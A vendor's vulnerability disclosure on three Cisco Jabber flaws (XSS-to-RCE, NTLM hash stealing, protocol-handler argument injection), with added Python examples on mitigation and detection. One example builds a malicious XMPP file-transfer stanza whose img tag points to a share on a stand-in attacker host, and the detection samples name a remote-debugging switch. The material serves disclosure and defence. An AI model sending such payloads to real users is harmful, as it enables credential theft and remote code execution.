Watchcom discovers new Cisco Jabber vulnerabilities
TL;DR Three months ago, Watchcom disclosed four high severity vulnerabilities in Cisco Jabber. One of the vulnerabilities allowed Remote Code Execution (RCE) by sending specially crafted chat messages. The vulnerabilities were reported to Cisco and a patch was issued. Shortly after, one of Watchcom’s clients requested a verification audit of the patch to ensure that the vulnerabilities had been sufficiently mitigated.
Figure 1: Jabber RCE through malicious filenames.
Three of the four vulnerabilities Watchcom disclosed in September have not been sufficiently mitigated. Cisco released a patch that fixed the injection points we reported, but the underlying problem has not been fixed. As such, we were able to find new injection points that could be used to exploit the vulnerabilities. All currently supported versions of the Cisco Jabber client (12.1 - 12.9) are affected.
The three vulnerabilities have been assigned new CVE numbers to distinguish them from the vulnerabilities disclosed in September. The new CVE numbers and the corresponding CVSS scores are listed below:
- CVE-2020-26085: Cisco Jabber Cross-Site Scripting leading to RCE (CVSS 9.9)
- CVE-2020-27132: Cisco Jabber Password Hash Stealing Information Disclosure (CVSS 6.5)
- CVE-2020-27127: Cisco Jabber Custom Protocol Handler Command Injection (CVSS 4.3)
This article describes the technical details of the vulnerabilities and gives advice for detection and mitigation.
The new vulnerabilities have the same impact as the original and range from medium to critical severity. Two of the vulnerabilities can be used to gain remote code execution.
The most severe vulnerability is a Cross Site Scripting (XSS) vulnerability that can be used to achieve RCE by escaping the sandbox of the Chromium Embedded Framework (CEF) browser that renders chat messages. It does not require user interaction and is wormable, since the payload is delivered via an instant message. This means that it can be used to automatically spread malware from one client to the next without any user interaction.
The second vulnerability can be exploited to collect NTLM password hashes from unsuspecting users. By sending a message that contains a malicious <img> tag, an attacker can force the victim’s Cisco Jabber client to fetch the image from a file share the attacker controls. If the file share requires authentication, the client authenticates automatically and the victim’s NTLM challenge response (the Net-NTLM hash) is sent to the attacker, who can crack it offline or relay it.
The final vulnerability regards the custom protocol handlers used by Cisco Jabber. These protocol handlers are vulnerable to command injection because they fail to consider URLs that contain spaces. The URL is passed to the application on its command line, so a space splits it into additional arguments, and an attacker can thereby inject arbitrary command line flags that the application will parse. Since the application uses CEF and accepts Chromium command line flags, several flags exist that can be used to execute arbitrary commands or load arbitrary DLLs.
Although the patch filters some of these flags, Watchcom was still able to identify a dangerous flag that bypasses the filter. The flag enables remote debugging of the embedded browser, allowing an attacker on the same network to take control of the embedded browser in the victim’s Cisco Jabber client. A blocklist of known-bad flags is inherently fragile; the robust fix is to reject or encode any URL that could be split into more than one argument before it reaches the handler.
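The following is an added example, not Watchcom’s or Cisco’s code, that models the argument-injection mechanism just described: a protocol-handler registration that forwards the raw URL as an unquoted %1 lets a space in the URL become a further argument, which a CEF-based client then parses as a Chromium switch. The scheme `example-jabber:`, the executable path and the switch name are placeholders (the writeup does not name the flag that bypassed the filter), and `split_command_line()` is a simplified model of Windows argument splitting, not CommandLineToArgvW.

```python
"""
Added example (not Watchcom's or Cisco's code): how an unquoted %1 in a
protocol-handler registration turns a space in the URL into extra
command line arguments, and the structural check that prevents it.
All names and paths are placeholders.
"""
import re
import subprocess  # list2cmdline() only builds a properly quoted command line

EXE = r"C:\Program Files\Cisco\CiscoJabber.exe"   # placeholder path
UNQUOTED_HANDLER = f'"{EXE}" %1'                   # weak registration: %1 is not quoted


def split_command_line(cmdline):
    """Simplified Windows-style argv splitting: whitespace separates arguments,
    double quotes group, and a backslash-escaped quote is a literal quote."""
    argv, cur, in_quotes, i = [], [], False, 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == "\\" and cmdline[i + 1:i + 2] == '"':
            cur.append('"')
            i += 2
            continue
        if c == '"':
            in_quotes = not in_quotes
        elif c.isspace() and not in_quotes:
            if cur:
                argv.append("".join(cur))
                cur = []
        else:
            cur.append(c)
        i += 1
    if cur:
        argv.append("".join(cur))
    return argv


def argv_from_weak_handler(url):
    """What the executable sees when the registry template substitutes %1 verbatim."""
    return split_command_line(UNQUOTED_HANDLER.replace("%1", url))


def argv_from_quoted_handler(url):
    """Quoting the URL keeps it in one argument (necessary, but not sufficient on its own)."""
    return split_command_line(subprocess.list2cmdline([EXE, url]))


def injected_switches(argv):
    """Anything after the URL argument that the CEF command line parser would treat as a switch."""
    return [a for a in argv[2:] if a.startswith("--")]


URL_RE = re.compile(r'^[A-Za-z][A-Za-z0-9+.\-]*:[^\s"]+$')


def is_well_formed_url(url):
    """Positive check to apply before the URL reaches the handler: a scheme followed
    by characters that can never contain whitespace or quotes. Percent-encoded
    spaces (%20) pass; the handler must then not decode them before exec."""
    return bool(URL_RE.match(url))


if __name__ == "__main__":
    url = "example-jabber:room --injected-switch=1"   # placeholder switch name
    print("weak   :", argv_from_weak_handler(url), injected_switches(argv_from_weak_handler(url)))
    print("quoted :", argv_from_quoted_handler(url), injected_switches(argv_from_quoted_handler(url)))
    print("allowed:", is_well_formed_url(url), is_well_formed_url("example-jabber:room%20x"))
```

The point of `is_well_formed_url()` is that it is a positive rule about the shape of the input; filtering named switches, as the patch does, has to anticipate every switch Chromium will ever honour.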
Two of the vulnerabilities are caused by the ability to inject custom HTML tags into XMPP messages. The patch released in September only patched the specific injection points that Watchcom had identified. The underlying issue was not addressed. We were therefore able to find new injection points that could be used to exploit the vulnerabilities.
Figure 2: The name attribute of file transfer messages was identified as a new injection point. Here, an img tag pointing to a malicious file share is injected into the message.
One of these injection points is the filename of a file sent through Cisco Jabber. The filename is specified by the name attribute of a file tag sent over XMPP. This attribute is displayed in the DOM when an incoming file transfer is received. The value of the attribute is not sanitized before being added to the DOM, so by manipulating the attribute an attacker can inject arbitrary HTML tags into the file transfer message.
Figure 3: The malicious img tag is loaded by the victim.
No additional security measures had been put in place and it was therefore possible to both gain remote code execution and steal NTLM password hashes using this new injection point.
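The following is an added example, not Watchcom’s or Cisco’s code. It reproduces the pattern described above: the `name` attribute of an XMPP file-transfer element is concatenated into the chat markup without sanitisation, beside the same rendering with entity escaping. The stanza is constructed for the example, the `<file>` element is a simplified stand-in for the real file-transfer payload, and the UNC path is a placeholder.

```python
"""
Added example (not Watchcom's or Cisco's code): an unsanitised XMPP
file-transfer 'name' attribute rendered straight into markup, and the
escaped alternative. The stanza and the UNC path are constructed.
"""
import html
import re
import xml.etree.ElementTree as ET

# Constructed stanza. The filename carries an <img> tag whose src is a UNC
# path, so a client that renders the name as HTML fetches the image from the
# attacker's share. '&lt;' is how '<' must appear inside an XML attribute;
# the parser turns it back into a literal '<'.
MALICIOUS_STANZA = r"""<message from='attacker@example.net' to='victim@example.com' type='chat'>
  <file name='report.pdf&lt;img src="\\files.attacker.example\share\x.png">' size='1337'/>
</message>"""


def parse_file_transfer(stanza_xml):
    """Extract the fields a client would display for an incoming transfer."""
    root = ET.fromstring(stanza_xml)
    file_el = root.find("file")
    return {"from": root.get("from"), "name": file_el.get("name"), "size": file_el.get("size")}


def render_unsafe(transfer):
    """Vulnerable pattern: attacker-controlled text concatenated into markup."""
    return (f'<div class="file-transfer">{transfer["from"]} sent '
            f'{transfer["name"]} ({transfer["size"]} bytes)</div>')


def render_safe(transfer):
    """Hardened: every untrusted field is entity-escaped before insertion."""
    return (f'<div class="file-transfer">{html.escape(transfer["from"])} sent '
            f'{html.escape(transfer["name"])} ({html.escape(transfer["size"])} bytes)</div>')


ACTIVE_TAG_RE = re.compile(r"<\s*(img|script|iframe|svg|object|embed|a)\b", re.I)


def injected_tags(markup):
    """Tags present in the rendered markup that the template itself never emits."""
    return [m.lower() for m in ACTIVE_TAG_RE.findall(markup)]


if __name__ == "__main__":
    transfer = parse_file_transfer(MALICIOUS_STANZA)
    print("unsafe:", render_unsafe(transfer))
    print("safe:  ", render_safe(transfer))
    print("injected:", injected_tags(render_unsafe(transfer)), injected_tags(render_safe(transfer)))
```

Escaping at the rendering boundary, rather than blocking specific attributes, is what closes every injection point of this class at once; patching the individual attributes that a reporter happened to find is what left the filename attribute open.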
Like last time, we advise all Cisco Jabber users to update to the latest version as soon as possible.
Since some of the vulnerabilities are wormable, organizations should consider disabling communication with external organizations through Cisco Jabber until all employees have installed the update. This can be done by disabling XMPP federation or configuring a policy for XMPP federation. See this article from Cisco for more information.
Note that Watchcom has not verified the patches and cannot guarantee that they are effective. We therefore recommend performing a security audit of the patched version before putting it to use.
Blue teams that want to detect potential exploitation of these vulnerabilities should be aware of the following indicators:
- XMPP messages with unusual HTML content.
- Invocations of CiscoJabber.exe with unusual flags.
- Unusual sub-processes of CiscoJabber.exe.
- Malicious files being sent through Cisco Jabber’s file sharing feature.
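The following is an added example, not Watchcom’s code: a small rule set for the indicators above, run over constructed events. The event dictionaries, the image names and the baseline of expected switches and child processes are assumptions to be mapped onto your own telemetry (for instance Sysmon process-creation events and XMPP proxy logs). The remote-debugging switch in the sample data is Chromium’s standard one, used only as an illustration; the writeup does not name the flag that bypassed the filter.

```python
"""
Added example (not Watchcom's code): toy detection rules for the four
indicators, run over constructed events. Baselines are assumptions.
"""
import re

HTML_TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z][\w-]*(\s[^>]*)?>")
SWITCH_RE = re.compile(r"(?:^|\s)(--[A-Za-z][\w-]*)")

# Assumed baseline: CEF helper processes are launched with --type=<role>;
# any other switch on a CiscoJabber.exe command line is worth a look.
EXPECTED_SWITCHES = {"--type"}
# Assumed baseline of children seen in normal operation; populate from your own environment.
EXPECTED_CHILDREN = {"ciscojabber.exe"}


def check_message(evt):
    """Indicators 1 and 4: HTML in a message body or in a transferred file's name."""
    findings = []
    for field in ("body", "file_name"):
        value = evt.get(field)
        if value and HTML_TAG_RE.search(value):
            findings.append(f"html_in_{field}")
    return findings


def check_process(evt):
    """Indicators 2 and 3: unexpected switches on CiscoJabber.exe, unexpected children of it."""
    findings = []
    image, parent = evt["image"].lower(), evt.get("parent", "").lower()
    if image == "ciscojabber.exe":
        unexpected = [s for s in SWITCH_RE.findall(evt["cmdline"]) if s.lower() not in EXPECTED_SWITCHES]
        if unexpected:
            findings.append("unexpected_switches:" + ",".join(unexpected))
    if parent == "ciscojabber.exe" and image not in EXPECTED_CHILDREN:
        findings.append(f"unexpected_child:{image}")
    return findings


def scan(events):
    """Return (event index, findings) for every event that triggers a rule."""
    hits = []
    for i, evt in enumerate(events):
        findings = check_message(evt) if evt["type"] == "xmpp" else check_process(evt)
        if findings:
            hits.append((i, findings))
    return hits


SAMPLE_EVENTS = [  # constructed for this example
    {"type": "xmpp", "from": "bob@partner.example", "file_name": "q3-report.pdf"},
    {"type": "xmpp", "from": "mallory@attacker.example",
     "file_name": 'x.pdf<img src="\\\\198.51.100.7\\s\\p.png">'},
    {"type": "process", "image": "CiscoJabber.exe", "parent": "CiscoJabber.exe",
     "cmdline": r'"C:\Program Files\Cisco\CiscoJabber.exe" --type=renderer'},
    {"type": "process", "image": "CiscoJabber.exe", "parent": "explorer.exe",
     "cmdline": r'"C:\Program Files\Cisco\CiscoJabber.exe" example-jabber:room --remote-debugging-port=9222'},
    {"type": "process", "image": "cmd.exe", "parent": "CiscoJabber.exe", "cmdline": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS):
        print(index, findings)
```

The child-process rule is the one that catches RCE regardless of which injection point or flag was used, so it is the one to tune first; the switch and HTML rules are there to catch attempts that did not succeed.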
Cisco has published a security advisory for the vulnerabilities - see the following link for their recommendations.
The continued existence of these vulnerabilities, even after the first patch, highlights the complexity of modern software and the challenges developers face when trying to secure it. When choosing to use frameworks such as CEF, it is important to consider their security implications. Security should also be considered in every step of the development process, in the initial planning stages as well as during implementation and maintenance.
This also serves as a reminder that software acquired from external vendors poses a risk to an organization’s IT security. It is important to be aware of these risks and take steps to mitigate them. Watchcom recommends regular audits of third-party software for security vulnerabilities.
- 2nd September 2020: Original vulnerabilities publicly disclosed. Patches released by Cisco.
- 25th September 2020: New vulnerabilities discovered and reported to Cisco PSIRT. Case number assigned by Cisco. Issue forwarded to the Cisco Jabber engineering team.
- 12th October 2020: Vulnerabilities confirmed by Cisco.
- 12th October 2020 - 10th December 2020: Patches developed.
- 10th December 2020: Patches released. Vulnerabilities publicly disclosed.